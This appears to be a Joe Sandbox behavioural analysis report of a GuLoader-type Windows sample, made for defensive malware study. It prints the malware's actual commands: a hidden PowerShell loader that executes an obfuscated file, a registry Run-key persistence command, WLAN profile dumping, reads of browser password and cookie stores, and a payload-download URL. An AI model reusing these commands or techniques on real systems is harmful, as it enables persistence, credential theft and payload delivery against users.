            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597370s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597258s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597146s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597034s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596906s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596794s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596682s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596571s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596460s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596348s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596220s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -596093s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595981s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595870s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595760s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595647s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595537s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595425s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595300s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595173s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -595045s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -594933s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -594822s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -594711s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -594599s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -594471s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -594343s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 1172 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599888
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599776
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599664
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599554
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599443
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599332
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599204
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599076
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598964
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598852
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598741
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598630
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598518
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598391
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598279
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598167
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598056
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597945
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597833
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597715
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597610
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597482
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597370
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597258
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597146
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597034
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596906
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596794
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596682
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596571
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596460
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596348
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596220
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596093
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595981
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595870
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595760
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595647
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595537
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595425
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595300
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595173
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595045
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594933
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594822
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594711
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594599
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594471
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594343
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 44E0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 327FDBC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 4260000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2DBFB9C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

Source: Yara match | File source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key3.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
Source: Yara match | File source: 00000012.00000002.2217463796.0000000024FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

Source: Yara match | File source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 131 Windows Management Instrumentation | 11 Command and Scripting Interpreter | 1 PowerShell | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: 111 Process Injection | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Login Hook | Network Logon Script | RC Scripts | Startup Items
Defense Evasion: 11 Masquerading | 1 Modify Registry | 11 Disable or Modify Tools | 171 Virtualization/Sandbox Evasion | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 25 Security Software Discovery | 1 Process Discovery | 171 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Network Configuration Discovery | 2 File and Directory Discovery | 53 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: 1 Data from Local System | 1 Clipboard Data | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: 2 Encrypted Channel | 1 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 13 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery

Source | Detection | Scanner | Label | Link
file.exe | 8% | ReversingLabs | Win32.Trojan.GuLoader |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://crowninter.com/jAscfKcoNcxeCpbJ57.bin | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
whatismyipaddressnow.co | 104.21.71.78 | true | false | | unknown
crowninter.com | 174.142.247.185 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
icanhazip.com | 104.16.185.241 | true | false | | high
169.241.9.0.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://crowninter.com/jAscfKcoNcxeCpbJ57.bin | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
174.142.247.185 | crowninter.com | Canada | | 32613 | IWEB-ASCA | false
23.221.242.90 | unknown | United States | | 8612 | TISCALI-IT | false
104.16.185.241 | icanhazip.com | United States | | 13335 | CLOUDFLARENETUS | false
104.21.71.78 | whatismyipaddressnow.co | United States | | 13335 | CLOUDFLARENETUS | false
IP
127.0.0.1
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1430487
                          Start date and time:2024-04-23 18:04:53 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:31
                          Number of new started drivers analysed:0
